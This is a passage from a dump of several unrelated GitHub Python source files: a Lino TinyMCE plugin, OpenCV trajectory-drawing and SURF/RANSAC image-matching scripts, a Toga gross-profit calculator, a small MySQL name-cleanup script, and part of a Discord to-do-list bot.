y)\r\npyautogui.click()\r\n\r\ntime.sleep(10)\r\ntime.sleep(10)\r\n\r\n#Screenshot da tela de avaliação\r\ndriver.save_screenshot(\"avaliacao.png\")\r\nprint(\"Screenshot do primeiro 
resultado!\")\r\ntime.sleep(3)\r\n\r\ndriver.quit()\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"lleonardx/QAEng","sub_path":"python-desafio_3/desafio_3.py","file_name":"desafio_3.py","file_ext":"py","file_size_in_byte":2993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73720853287","text":"from lino.api import ad\n\n\n#TINYMCE_VERSION = '3.4.8'\n#TINYMCE_VERSION = '4.1.10'\nTINYMCE_VERSION = '3.5.11'\n\n\"\"\"Which version of TinyMCE to use.\n\nWith 4.1.10, windows containing a TextField don't open, and the JS\nconsole says \"TypeError: sp is undefined\". That's because we did not\nyet get Andrew Mayorov's\n:srcref:`lino/modlib/tinymce/static/byteforce/Ext.ux.TinyMCE.js` to\nwork with TinyMCE 4. It seems that either ControlManager or\nWindowManager no longer are functions in tinymce4.\n\n\"\"\"\n\n\ndef javascript(url):\n return ''.format(url)\n\n\nclass Plugin(ad.Plugin):\n \"See :doc:`/dev/plugins`.\"\n\n needs_plugins = ['lino.modlib.office']\n # needs_plugins = ['lino.modlib.office', 'lino.modlib.extjs']\n\n site_js_snippets = ['tinymce/tinymce.js']\n\n url_prefix = 'tinymce'\n\n # window_width = 600\n # window_height = 500\n\n document_domain = None\n \"\"\"The domain name of this production site.\"\"\"\n\n window_width = 500\n \"\"\"The initial width of the window to use when editing in own\n window.\n\n \"\"\"\n\n window_height = 400\n \"\"\"The initial height of the window to use when editing in own\n window.\n\n \"\"\"\n\n field_buttons = (\n \"bold,italic,underline,|,justifyleft,justifycenter,justifyright,|,\"\n \"bullist,numlist,|,outdent,indent,|,undo,redo,|,removeformat,template\")\n \"\"\"The toolbar buttons when editing a field inside a detail form.\"\"\"\n\n window_buttons1 = (\n \"save,cancel,|,bold,italic,underline,|,justifyleft,justifycenter,\"\n \"justifyright,fontselect,fontsizeselect,formatselect,|,\"\n \"search,replace\")\n \"\"\"The first row of toolbar buttons when editing in own window.\"\"\"\n window_buttons2 = (\n \"cut,copy,paste,template,|,bullist,numlist,|,outdent,indent,|,\"\n \"undo,redo,|,link,unlink,anchor,image,|,code,preview,|,forecolor,\"\n \"backcolor\")\n \"\"\"The second row of toolbar buttons when editing in own window.\"\"\"\n\n window_buttons3 = (\n \"insertdate,inserttime,|,spellchecker,advhr,,removeformat,|,\"\n \"sub,sup,|,charmap,emotions,|,tablecontrols\")\n \"\"\"The third row of toolbar buttons when editing in own window.\"\"\"\n\n media_name = 'tinymce-' + TINYMCE_VERSION\n \"\"\"Lino currently includes three versions of TinyMCE, but for\n production sites we still use the eldest version 3.4.8.\n\n \"\"\"\n\n media_root = None\n # media_base_url = \"http://www.tinymce.com/js/tinymce/jscripts/tiny_mce/\"\n # media_base_url = \"http:////tinymce.cachefly.net/4.1/tinymce.min.js\"\n\n def get_used_libs(self, html=False):\n if html is not None:\n yield (\"TinyMCE\", TINYMCE_VERSION, \"http://www.tinymce.com/\")\n yield (\"Ext.ux.TinyMCE\", '0.8.4', \"http://www.byte-force.com\")\n\n def get_js_includes(self, settings, language):\n if settings.SITE.kernel.default_renderer.extjs_version:\n if TINYMCE_VERSION.startswith('3'):\n yield self.build_lib_url('tiny_mce.js')\n else:\n yield self.build_lib_url('tinymce.min.js')\n yield settings.SITE.build_static_url(\"byteforce\", \"Ext.ux.TinyMCE.js\")\n\n def get_patterns(self):\n from django.urls import re_path as url\n # from django.conf.urls import url\n from . 
import views\n\n rx = '^'\n\n urlpatterns = [\n url(rx + r'templates/(?P\\w+)/'\n + r'(?P\\w+)/(?P\\w+)/(?P\\w+)$',\n views.Templates.as_view()),\n url(rx + r'templates/(?P\\w+)/'\n + r'(?P\\w+)/(?P\\w+)/(?P\\w+)/'\n + r'(?P\\w+)$',\n views.Templates.as_view())]\n\n return urlpatterns\n\n def get_row_edit_lines(self, e, panel):\n from lino.core.elems import TextFieldElement\n if isinstance(e, TextFieldElement):\n if e.format == 'html':\n yield \"%s.refresh();\" % e.as_ext()\n\n def setup_config_menu(self, site, user_type, m):\n if site.user_model is not None:\n mg = site.plugins.office\n m = m.add_menu(mg.app_label, mg.verbose_name)\n m.add_action('tinymce.MyTextFieldTemplates')\n\n def setup_explorer_menu(self, site, user_type, m):\n if site.user_model is not None:\n mg = site.plugins.office\n m = m.add_menu(mg.app_label, mg.verbose_name)\n m.add_action('tinymce.TextFieldTemplates')\n","repo_name":"lino-framework/lino","sub_path":"lino/modlib/tinymce/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4451,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"53"} +{"seq_id":"18928581755","text":"\"\"\"\n\nby Hao Xue @ 30/08/18\n\n\"\"\"\nimport cv2\nfrom modules.visual_object import VisualObject\nimport numpy as np\nfrom tputils.dataprocessing.pixel_normalize import trajectory_matrix_norm\nimport os\nfrom typing import List, Dict\nfrom gv_tools.util.region import Region\nfrom gv_tools.util import visual, pather, core\nfrom gv_tools.tracking.track_frame import TrackFrame\nfrom gv_tools.tracking.tracklet import Tracklet\n\n\nclass DrawTrajectory:\n OUTPUT_PATH = '/home/ubuntu/Desktop/trajectory-visualization/ouput/nygc_pred/'\n color = (277, 277, 48)\n OBS_COLOR = (0, 255, 255)\n PRED_COLOR = (0, 255, 0)\n GT_COLOR = (255, 0, 0)\n\n def __init__(self, original_video: str, obs_data: str, predicted: str, ground_truth: str, data: str):\n self.video_cap = cv2.VideoCapture(original_video)\n self.obs = np.load(obs_data)\n self.predicted = np.load(predicted)\n self.predicted = trajectory_matrix_norm(self.predicted, 720, 480, 2)\n self.gt = np.load(ground_truth)\n self.data = np.load(data)\n\n def process(self):\n frame_index = 0\n while self.video_cap.isOpened():\n cap, frame = self.video_cap.read()\n\n img = np.copy(frame)\n # self.draw_all(img, frame_index)\n if frame_index > 41077:\n img = self.draw_obs(img, frame_index)\n img = self.draw_gt(img, frame_index)\n self.write_output(img, frame_index)\n frame_index += 1\n\n def process_frame(self):\n pass\n\n def draw_all(self, img, frame_index):\n draw_flag = False\n for t in self.data:\n for p in t:\n if p[-1] <= frame_index:\n draw_flag = True\n if draw_flag:\n for i in range(len(t)):\n point = t[i]\n if point[-1] < frame_index:\n cv2.circle(img, (point[0], point[1]), 4, color=self.color, thickness=-1)\n if i < len(t)-1:\n cv2.line(img, (point[0], point[1]), (t[i+1][0], t[i+1][1]), color=self.color, thickness=2)\n\n def draw_obs(self, img, frame_index):\n draw_flag = False\n for t in self.obs:\n for p in t:\n if p[-1] <= frame_index:\n draw_flag = True\n if draw_flag:\n for i in range(len(t)):\n point = t[i]\n if point[-1] < frame_index:\n cv2.circle(img, (point[0], point[1]), 2, color=self.OBS_COLOR, thickness=-1)\n if i < len(t)-1:\n cv2.line(img, (point[0], point[1]), (t[i+1][0], t[i+1][1]), color=self.OBS_COLOR, thickness=1)\n\n return img\n\n def draw_gt(self, img, frame_index):\n draw_flag = False\n for index in range(len(self.gt)):\n for p in self.gt[index]:\n if p[-1] <= 
frame_index:\n draw_flag = True\n if draw_flag:\n traj = self.predicted[index]\n for i in range(len(traj)):\n point = traj[i]\n if point[-1] < frame_index:\n cv2.circle(img, (int(point[0]), int(point[1])), 2, color=self.PRED_COLOR, thickness=-1)\n if i < len(traj)-1:\n cv2.line(img, (int(point[0]), int(point[1])),\n (int(traj[i+1][0]), int(traj[i+1][1])), color=self.PRED_COLOR, thickness=1)\n for i in range(len(self.gt[index])):\n point = self.gt[index][i]\n if point[-1] < frame_index:\n cv2.circle(img, (point[0], point[1]), 2, color=self.GT_COLOR, thickness=-1)\n if i < len(self.gt[index])-1:\n cv2.line(img, (point[0], point[1]),\n (self.gt[index][i+1][0], self.gt[index][i+1][1]),\n color=self.GT_COLOR, thickness=1)\n return img\n\n def write_output(self, img, frame_index):\n output_path = self.OUTPUT_PATH + str(frame_index).zfill(8) + '.jpg'\n cv2.imwrite(output_path, img)\n\n\nd = DrawTrajectory(original_video='/home/ubuntu/Downloads/grandcentral.avi',\n data='/home/ubuntu/Desktop/TPSPM/data/o9_p8.npy',\n obs_data='/home/ubuntu/Desktop/TPSPM/results/NYGC_setting_o9_p8/obs.npy',\n predicted='/home/ubuntu/Desktop/TPSPM/results/NYGC_setting_o9_p8/1_predicted.npy',\n ground_truth='/home/ubuntu/Desktop/TPSPM/results/NYGC_setting_o9_p8/gt.npy')\nd.process()\n\n# a = np.load('/home/ubuntu/Desktop/TPSPM/results/NYGC_setting_o9_p8/gt.npy')\n# print(a.shape)\n# print(np.min(a[:, :, -1]))\n","repo_name":"xuehaouwa/trajectory-visualization","sub_path":"scripts/draw_trajectory.py","file_name":"draw_trajectory.py","file_ext":"py","file_size_in_byte":4789,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"13001895700","text":"#!/usr/bin/env python3\nimport toga\nfrom toga.style.pack import *\n# Author: StpircsDahc\n# Author's github repo - https://github.com/stpircsdahc\n\n\n\ndef discountit(cost, discount):\n print('tag tag tag')\n dPercentage = float(discount)/100.0\n salePrice = float(cost) - (float(cost) * dPercentage)\n salePrice = round(salePrice, 2)\n return salePrice\n\ndef markitup(cost, markup):\n muPercentage = float(markup)/100.0\n salePrice = float(cost) + (float(cost) * muPercentage)\n salePrice = round(salePrice, 2)\n gp = round(salePrice - cost, 2)\n return salePrice, gp\n\ndef build(app):\n msrp_box = toga.Box()\n discount_box = toga.Box()\n dPrice_box = toga.Box()\n markup_box = toga.Box()\n fPrice_box = toga.Box()\n GrossProfit_box = toga.Box()\n box = toga.Box()\n\n msrp_input = toga.TextInput()\n discount_input = toga.TextInput()\n dPrice_input = toga.TextInput(readonly=True)\n markup_input = toga.TextInput()\n fPrice_input = toga.TextInput(readonly=True)\n GrossProfit_input = toga.TextInput(readonly=True)\n\n msrp_label = toga.Label('MSRP - List Price', style=Pack(text_align=RIGHT))\n discount_label = toga.Label('Discount Percentage', style=Pack(text_align=RIGHT))\n dPrice_label = toga.Label('Discounted sales price', style=Pack(text_align=RIGHT))\n markup_label = toga.Label('Markup Percentage', style=Pack(text_align=RIGHT))\n fPrice_label = toga.Label('Final sales price', style=Pack(text_align=RIGHT))\n GrossProfit_label = toga.Label('Gross Profit', style=Pack(text_align=RIGHT))\n\n def click_calc(widget):\n if msrp_input.value and discount_input.value and markup_input.value:\n try:\n discountPrice = discountit(float(msrp_input.value), float(discount_input.value))\n dPrice_input.value = discountPrice\n markedupPrice, gProfit = markitup(float(discountPrice), markup_input.value)\n fPrice_input.value = markedupPrice\n 
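# gProfit comes back from markitup() already rounded to 2 decimal places\n                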
GrossProfit_input.value = gProfit\n except:\n dPrice_input.value = '????'\n fPrice_input.value = '????'\n GrossProfit_input.value = '????'\n elif msrp_input.value and discount_input.value:\n try:\n discountPrice = discountit(float(msrp_input.value), float(discount_input.value))\n dPrice_input.value = discountPrice\n fPrice_input.value = 'N/A'\n GrossProfit_input.value = 'N/A'\n except:\n dPrice_input.value = '????'\n fPrice_input.value = '????'\n GrossProfit_input.value = '????'\n else:\n pass\n\n calc_button = toga.Button('Calculate', on_press=click_calc)\n\n msrp_box.add(msrp_label)\n msrp_box.add(msrp_input)\n\n discount_box.add(discount_label)\n discount_box.add(discount_input)\n\n dPrice_box.add(dPrice_label)\n dPrice_box.add(dPrice_input)\n\n markup_box.add(markup_label)\n markup_box.add(markup_input)\n\n fPrice_box.add(fPrice_label)\n fPrice_box.add(fPrice_input)\n\n GrossProfit_box.add(GrossProfit_label)\n GrossProfit_box.add(GrossProfit_input)\n\n box.add(msrp_box)\n box.add(discount_box)\n box.add(dPrice_box)\n box.add(markup_box)\n box.add(fPrice_box)\n box.add(GrossProfit_box)\n box.add(calc_button)\n\n box.style.update(direction=COLUMN, padding_top=10)\n msrp_box.style.update(direction=ROW, padding=5)\n discount_box.style.update(direction=ROW, padding=5)\n dPrice_box.style.update(direction=ROW, padding=5)\n markup_box.style.update(direction=ROW, padding=5)\n fPrice_box.style.update(direction=ROW, padding=5)\n GrossProfit_box.style.update(direction=ROW, padding=5)\n\n msrp_input.style.update(flex=1, padding_right=60)\n discount_input.style.update(flex=1, padding_right=60)\n dPrice_input.style.update(flex=1, padding_right=60)\n markup_input.style.update(flex=1, padding_right=60)\n fPrice_input.style.update(flex=1, padding_right=60)\n GrossProfit_input.style.update(flex=1, padding_right=60)\n\n msrp_label.style.update(width=200, padding_right=10)\n discount_label.style.update(width=200, padding_right=10)\n dPrice_label.style.update(width=200, padding_right=10)\n markup_label.style.update(width=200, padding_right=10)\n fPrice_label.style.update(width=200, padding_right=10)\n GrossProfit_label.style.update(width=200, padding_right=10)\n\n calc_button.style.update(padding=10, width=100)\n\n return box\n\n\n\ndef main():\n return toga.App('GP Calculator', 'org.stpricsdahc.GPCalc', startup=build)\n\nif __name__ == '__main__':\n main().main_loop()\n","repo_name":"StpircsDahc/First-Toga-App","sub_path":"toga_QuickGP.py3.py","file_name":"toga_QuickGP.py3.py","file_ext":"py","file_size_in_byte":4637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23079986076","text":"import pymysql\nfrom pymysql.cursors import DictCursor\nfrom Config.settings import attr_merge_conf\n\nTASK_TABLE = 'chat_attraction_new'\n\n\ndef name_problem():\n conn = pymysql.connect(**attr_merge_conf)\n cursor = conn.cursor(cursor=DictCursor)\n sql = 'select id,name,name_en from {0}'.format(TASK_TABLE)\n cursor.execute(sql)\n datas = []\n for line in cursor.fetchall():\n miaoji_id = line['id']\n name = line['name']\n name_en = line['name_en']\n if name == '':\n name = name_en\n datas.append((name, miaoji_id))\n return update_db(datas)\n\n\ndef update_db(args):\n conn = pymysql.connect(**attr_merge_conf)\n cursor = conn.cursor()\n sql = 'update {0} set name=%s where id=%s'.format(TASK_TABLE)\n res = cursor.executemany(sql, args)\n conn.close()\n return res\n\n\nif __name__ == '__main__':\n 
print(name_problem())\n","repo_name":"20113261/p_m","sub_path":"data_clean/attr_add_name.py","file_name":"attr_add_name.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24972105288","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport sys , os , random\nimport cv, cv2\nimport numpy as np\nfrom numpy.lib.stride_tricks import as_strided\n \nSURF_THRESHOLD = 1000\nSURF_MATCH_THRESHOLD = 0.3\n \nINLIER_DISTANCE_THRESHOLD = 30\nNUMBER_OF_INLIERS_THRESHOLD = 0.8\n \n \n \ndef SURFdetector ( image ):\n\tglobal SURF_THRESHOLD\n\tdetector = cv2.SURF(SURF_THRESHOLD, 10, 10)\n\tkeypoints, descriptors = detector.detectAndCompute(image, None)\n\treturn keypoints, descriptors\n \ndef SURFmatcher(keypoints_set , descriptors_set):\n\tkeypoint_1 = keypoints_set[0]\n\tkeypoint_2 = keypoints_set[1]\n\tdescriptor_1 = descriptors_set[0]\n\tdescriptor_2 = descriptors_set[1]\n \n\tdiff = descriptor_2 - descriptor_1[:,None]\n\tsqure_of_diff = diff ** 2\n\tsum_square_diff = squre_of_diff.sum(axis=-1)\n\tscore = np.sqrt(sum_square_diff.min(axis=-1))\n\tmatches = np.argmin(sum_square_diff,axis=-1)\n\tinvalid_matches = score > SURF_MATCH_THRESHOLD \n\t\n\tscore[invalid_matches] = -1\n\tmatches[invalid_matches] = -1\n \n\treturn matches , score\n \ndef correspondace_map(features_1, features_2, matches):\n\t\n\tdef feature_to_point(keypoint):\n\t\tx,y = keypoint.pt\n\t\treturn x , y\n \n\tvalid_matches_bool = matches != -1\n\tvalid_matches = matches[valid_matches_bool]\n\tfeature_to_array = np.vectorize(feature_to_point)\n \n\tfeatures1 = (np.asarray(feature_to_array(features_1))).T\n\tfeatures2 = (np.asarray(feature_to_array(features_2))).T\n \n\tvalid_features1 = features1[valid_matches_bool]\n\tvalid_features2 = features2[valid_matches,:]\n \n\tcorrespondace = np.hstack((valid_features1, valid_features2))\n\treturn correspondace\n \ndef HomograpgyCalculation(correspondace, for_ransac=True):\n\t\n\tdef Making_A(point):\n\t\tx,y,x1,y1 = point.item(0), point.item(1), point.item(2), point.item(3)\n\t\treturn x,y,1,0,0,0,-(x*x1),-(x1*y),0,0,0,x,y,1,-(x*y1),-(y*y1)\n\t\n\tdesired_correspondaces = 0\n\tif for_ransac == True:\n\t\trandom_indices = np.array(random.sample(range(correspondace.shape[0]), 8))\n\t\tdesired_correspondaces = correspondace[random_indices,:]\n\telse :\n\t\tdesired_correspondaces = correspondace\n \n\t#print desired_correspondaces.shape\n \n\tB = desired_correspondaces[:,2:4].flatten()\n\tA = np.apply_along_axis(Making_A,1,desired_correspondaces).reshape(-1,8)\n \n \n\t#Computing over determined solution using psudo inverse of A\n\tA_psudo_inverse = np.dot ( np.linalg.inv( np.dot ( A.T , A ) ) , A.T )\n\tx = np.dot ( A_psudo_inverse , B )\n \n\tH = (np.append(x,1)).reshape(3,3)\n\t\n\treturn H\n \ndef RANSAC ( features_set, matches, H ):\n\t\t\n\tfeatures1 = features_set[0]\n\tfeatures2 = features_set[1]\n\t\n\tcorrespondace = correspondace_map(features1 , features2 , matches)\n\tnumber_of_correspondences = correspondace.shape[0]\n \n\tinlier_set = 0\n\toutliers = 0\n\tbest_inliers = 0\n\t\n\ttrials = 0\n\tN = 1e3\n\tmax_inliers = 10\n\tmin_variance = 1e10\n \n\twhile trials < N :\n \n\t\ttemp_H = HomograpgyCalculation(correspondace)\n \n\t\tcorrespondace_img1 = correspondace[:,0:2]\n\t\tcorrespondace_img2 = correspondace[:,2:4]\n \n\t\t#padding one at the end\n\t\tcorrespondace_img = np.ones((correspondace_img1.shape[0],correspondace_img1.shape[1]+1))\n\t\tcorrespondace_img[:,:-1] = 
correspondace_img1\n\t\t#multiplying with temp \n\t\tcorrespondace_mul_H = np.dot(temp_H,correspondace_img.T).T\n\t\tcorrespondace_H = (np.divide(correspondace_mul_H[:,0:2].T,correspondace_mul_H[:,2])).T\n \n\t\t#print np.dot(H,correspondace_img.T),T\n\t\tdiff = correspondace_img2 - correspondace_H\n\t\t#print diff\n\t\terror = (((diff[:,0]**2) + (diff[:,1]**2))**0.5)\n \n\t\tinlier_indices = error < INLIER_DISTANCE_THRESHOLD\n\t\tinlier_set = correspondace[inlier_indices,:]\n\t\tnumber_of_inliers = inlier_set.shape[0] \n \n\t\t#print number_of_inliers\n \n\t\tif number_of_inliers > max_inliers :\n\t\t\terror_mean = (error.sum(axis=-1))/number_of_inliers\n\t\t\tvariance = ((error**2).sum(axis=-1)) - error_mean\n\t\t\tif variance < min_variance :\n\t\t\t\tmax_inliers = number_of_inliers\n\t\t\t\tmin_variance = variance\n\t\t\t\tH = temp_H\n\t\t\t\tbest_inliers = inlier_set\n\t\t\t\toutliers_indices = np.logical_not(inlier_indices)\n\t\t\t\toutliers = correspondace[outliers_indices,:]\n \n\t\t#Update N and no of trials\n\t\ttrials +=1 \n \n\t\tif number_of_inliers > 0 :\n\t\t\te = 1.0 - float ( number_of_inliers )/ float ( number_of_correspondences )\n\t\t\te_1 = 1.0 - e\n\t\t\tif e_1 == 1:\n\t\t\t\tbreak\n\t\t\tif np . log (1.0 - e_1 * e_1 * e_1 * e_1 * e_1 * e_1 * e_1 * e_1 ) !=0:\n\t\t\t\tN = int (np. log (1.0-0.99) /np . log (1.0- e_1 * e_1 * e_1 * e_1 * e_1 * e_1 * e_1 * e_1 ) )\t\t\n \n\t\tif float ( number_of_inliers ) / float ( number_of_correspondences ) < NUMBER_OF_INLIERS_THRESHOLD \\\n\t\t\tand trials > N:\n\t\t\ttrials = 1\n \n \n\t#print H\n\t#print correspondace\n\t#print best_inliers\n \n\tHomograpgy_best_inliers = HomograpgyCalculation(best_inliers,for_ransac = False)\n \n\treturn best_inliers, outliers, Homograpgy_best_inliers\n \n \ndef main ( ) :\n \n\timage =[]\n\tkeypoints_set = []\n\tdescriptors_set = []\n\tH = 0\n \n\t#loading images\n\tfor i in range (len ( sys . argv ) - 1 ):\n\t\tfilename = sys . 
argv [ i + 1 ]\n\t\timage.append(cv2.imread (filename))\n \n\twidth = image[0].shape[1]\n\theight = image[0].shape[0]\n \n\tsurf_features = np.zeros((height , len(image)*width ,3) ,np.uint8)\n\tsurf_matches = np.zeros((height , len(image)*width ,3) ,np.uint8)\n\t\n\tfor i in range(len(image)):\n \n\t\tkeypoints, descriptors = SURFdetector( image[i])\n\t\t\n\t\tkeypoints_set.append(keypoints)\n\t\tdescriptors_set.append(descriptors)\n \n\t\tsurf_features[0:height , i*width : (i + 1)*width , :] = image[i]\n\t\n\t\tfor j in range ( len ( keypoints ) ) :\n\t\t\tx , y = keypoints[j].pt\n\t\t\tcv2.circle ( surf_features , ( (i*width) + int (x) , int (y) ) , 0 , (255 , 0 , 0) , 4)\n\t\n\tcv2.imwrite('surf_features.png', surf_features)\n\t\n\t# draw on copies so the inlier and outlier overlays end up on separate images\n\tsurf_best_inliers = surf_features.copy()\n\toutliers_image = surf_features.copy()\n \n\tmatches, score = SURFmatcher(keypoints_set,descriptors_set)\n\tbest_inliers, outliers, Homograpgy_best_inliers = RANSAC(keypoints_set, matches, H)\n\t\n \n \n\t\n\tfor i in range ( len ( best_inliers ) ) :\n\t\tcv2.line (surf_best_inliers , ((int(best_inliers[i][0])) , (int(best_inliers[i][1]))), \\\n\t\t\t\t((int(best_inliers[i][2]))+width , (int(best_inliers[i][3]))), \\\n\t\t\t\t(255*( i%4) ,255*(( i+1)%4) , 255*(( i+2)%4) ) , 1 , cv2.CV_AA, 0)\n \n\tcv2.imwrite('surf_best_inliers.png', surf_best_inliers)\n \n\tfor i in range ( len ( outliers ) ) :\n\t\tcv2.line (outliers_image , ((int(outliers[i][0])) , (int(outliers[i][1]))), \\\n\t\t\t\t((int(outliers[i][2]))+width , (int(outliers[i][3]))), \\\n\t\t\t\t(255 ,255 , 255 ) , 1 , cv2.CV_AA, 0)\n\t\n\tcv2.imwrite('surf_outliers.png', outliers_image)\n \n \nmain()\n","repo_name":"eshafeeqe/Computer-Vision-Experiments","sub_path":"surf_ransac.py","file_name":"surf_ransac.py","file_ext":"py","file_size_in_byte":6385,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"13657803825","text":"import discord\nfrom discord.ext import commands\nimport asyncio\nimport random \nfrom .ShowCommands import *\n\nclass ModificationCommands(commands.Cog):\n    def __init__(self, bot):\n        self.bot = bot\n\n    ''' Commands '''\n\n    @commands.command(aliases=['c'], case_insensitive=True)\n    async def create(self, ctx, liste=None, *members: discord.Member):\n        if not liste:\n            await ctx.send(\"Please enter the liste name you want to create\")\n            return\n        \n        #check if the list exists\n        l_exists = await self.check_liste(ctx.author.id, liste) #if liste exists return id_liste\n        if l_exists:\n            await ctx.send(\"You already have a liste named {}\".format(liste))\n            return\n\n        #check if the main user exists\n        user = await self.check_user(ctx.author)\n\n        #set the mode\n        party = False\n        mode = False\n        if not len(members) == 0:\n            party=True\n            #give permissions to members\n            await ctx.send(\"Do you want the party members to be able to modify the party liste {} ? 
y or n \".format(liste.capitalize()))\n try:\n msg = await self.bot.wait_for(\n \"message\",\n timeout=17,\n check=lambda message: message.author == ctx.author \n and message.channel == ctx.channel\n )\n if msg.content.lower() == \"y\" or msg.content.lower() == \"yes\":\n mode = True #mode true = everyone can modify\n except asyncio.TimeoutError:\n await ctx.send(\"No respond, by default only <@{}> will be able to modify the list\".format(ctx.author.id))\n \n #create liste for all members that can be added\n (msg, not_added_member) = await self.add_members(ctx.author.id, members, liste, ctx.message.id, None)\n await self.create_liste(ctx.author.id, ctx.message.id, liste.lower(), ctx.author.id, mode, party)\n await ctx.send(\"{} \\nParty List {} successfully created! {} users have access\".format(msg, liste.lower(), len(members) + 1 - not_added_member))\n return \n\n #create list for main user\n await self.create_liste(ctx.author.id, ctx.message.id, liste.lower(), ctx.author.id, mode, party)\n\n await ctx.send(\"Liste {} successfully created, let's be productif miaw ;)\".format(liste))\n\n @commands.command(aliases=['j'], case_insensitive=True)\n async def join(self, ctx, liste=None, *members: discord.Member):\n if not liste or len(members) == 0:\n await ctx.send(\"You have to specify an existing liste and at least ping one member to add\")\n return\n\n id_liste = await self.check_liste(ctx.author.id, liste) #checks if a member already has a list with that name\n if not id_liste:\n await ctx.send(\"You have no liste named {}\".format(liste))\n return\n\n await self.bot.con.execute(\"UPDATE listes SET party=True WHERE id_liste=$1\", id_liste)\n (msg, not_added_member) = await self.add_members(ctx.author.id, members, liste, id_liste, None)\n\n await ctx.send(\"{} \\nParty List {} successfully updated! 
{} users added\".format(msg, liste.lower(), len(members) - not_added_member))\n\n @commands.command(aliases=['a'], case_insensitive=True)\n async def add(self, ctx, task=None, liste=None):\n if(task == None or liste == None):\n await ctx.send('Please write the commands as such :\\n !add \"task_name\" \"list_name\"')\n return\n liste = liste.lower()\n task = task.lower()\n \n user = await self.check_user(ctx.author)\n\n id_liste = await self.bot.con.fetchval(\"SELECT id_liste FROM main WHERE id_user=$1 AND l_name=$2\", ctx.author.id, liste.lower())\n\n #check if rights ok\n if not await self.check_rights(ctx, id_liste):\n await ShowCommands.show(self, ctx, liste)\n return \n\n #if not id_liste for user, don't add task\n if not id_liste:\n await ctx.send(\"List {} doesn't exist, type !create {} to create the list.\".format(liste, liste))\n return\n\n t_exists = await self.bot.con.fetch(\"SELECT id_task FROM main WHERE id_user=$1 AND l_name=$2 AND t_name=$3\", ctx.author.id, liste.lower(), task.lower())\n\n if t_exists:\n await ctx.send(\"Task {} already exists in {}\".format(task,liste)) \n return\n\n #add task to existing list\n await self.add_task(ctx.author.id, liste, ctx.message.id, task)\n await ctx.send('{} successfully added to {} !'.format(task, liste))\n await ShowCommands.show(self, ctx, liste)\n \n @commands.command(aliases=[\"remove\", \"del\"], case_insensitive=True)\n async def delete(self, ctx, task=None, liste=None):\n if not task:\n await ctx.send(\"Enter the task, list you want to remove\")\n return\n\n if not liste:\n substitue = task\n else:\n substitue = liste\n\n id_liste = await self.bot.con.fetchval(\"SELECT id_liste FROM main WHERE id_user=$1 AND l_name=$2\", ctx.author.id, substitue.lower())\n if not id_liste:\n await ctx.send(\" You have no liste named: {} \".format(substitue))\n return\n\n if not await self.check_rights(ctx, id_liste):\n await ShowCommands.show(self, ctx, substitue)\n return\n\n if not liste:\n liste = task\n await ctx.send(\"Are you sure you want to remove the entire {} liste ? 
type y or n\".format(liste))\n try:\n msg = await self.bot.wait_for(\n \"message\",\n timeout=17,\n check=lambda message: message.author == ctx.author \n and message.channel == ctx.channel\n )\n if msg.content.lower() == \"y\" or msg.content.lower() == \"yes\":\n await self.delete_liste(ctx, id_liste, ctx.author.id, liste) #Give Directly ID LIST\n return\n\n await ctx.send(\"{} has not been deleted\".format(liste))\n\n except asyncio.TimeoutError:\n await ctx.send(\"{} has not been deleted\".format(liste))\n return\n\n id_task = await self.bot.con.fetchval(\"SELECT id_task FROM main WHERE id_liste=$1 AND t_name=$2\", id_liste, task.lower())\n if not id_task:\n await ctx.send(\" You have no task named: {} \".format(task))\n return\n\n await self.delete_task(id_task, id_liste)\n await ctx.send(\"{} successfully deleted\".format(task))\n await ShowCommands.show(self, ctx, liste)\n\n @commands.command(aliases=[\"achieved\", \"finished\"], case_insensitive=True)\n async def done(self, ctx, task=None, liste=None):\n if not liste or not task:\n await ctx.send(\"Please specify the task you achieved\\n Enter: $done [liste name] [task name]\")\n return\n \n id_liste = await self.bot.con.fetchval(\"SELECT id_liste FROM main WHERE id_user=$1 AND l_name=$2\", ctx.author.id, liste.lower())\n if not await self.check_rights(ctx, id_liste):\n await ShowCommands.show(self, ctx, liste)\n return\n\n #set task to achieved\n stat_task = await self.check_task(id_liste, task)\n\n if stat_task and not stat_task[1]:\n await self.update_task(id_liste,stat_task[0])\n embed = discord.Embed(\n title=\"Congratulation on achieving your task :partying_face:\",\n color=random.randint(0, 0xffffff)\n )\n embed.set_image(url=\"https://media1.tenor.com/images/4598a55e2ed5c0f8a0d7680695f6c7a1/tenor.gif\")\n await ctx.send(embed=embed)\n await ShowCommands.show(self, ctx, liste)\n return\n\n if stat_task:\n await ctx.send(\"Task already achieved\")\n return\n\n await ctx.send(\"Task doesn't exist\")\n\n ''' Methods '''\n async def check_rights(self, ctx, id_liste):\n admin = await self.bot.con.fetchval(\"SELECT admin FROM listes WHERE id_liste=$1\", id_liste)\n mode = await self.bot.con.fetchval(\"SELECT mode FROM listes WHERE id_liste=$1\", id_liste)\n party = await self.bot.con.fetchval(\"SELECT party FROM listes WHERE id_liste=$1\", id_liste)\n\n if mode or admin == ctx.author.id or not party:\n return True\n \n await ctx.send(\"You don't have the rights to modify that list\")\n return False\n\n async def check_user(self, author):\n user = await self.bot.con.fetch(\"SELECT * FROM users WHERE id_user=$1\", author.id)\n await self.welcome(user, author)\n\n #if not user create a new user\n if not user:\n await self.bot.con.execute(\"INSERT INTO users (id_user, nb_tasks, nb_lists,nb_achieved) VALUES ($1,0,0,0)\", author.id)\n \n return await self.bot.con.fetchrow(\"SELECT * FROM users WHERE id_user=$1\", author.id)\n\n async def check_liste(self, id, liste):\n return await self.bot.con.fetchval(\"SELECT id_liste FROM main WHERE id_user=$1 AND l_name=$2\", id, liste.lower())\n\n async def check_task(self, id_liste, task):\n return await self.bot.con.fetchrow(\"SELECT id_task, achieved FROM tasks WHERE id_liste=$1 AND t_name=$2\", id_liste, task.lower())\n\n async def update_task(self, id_liste, 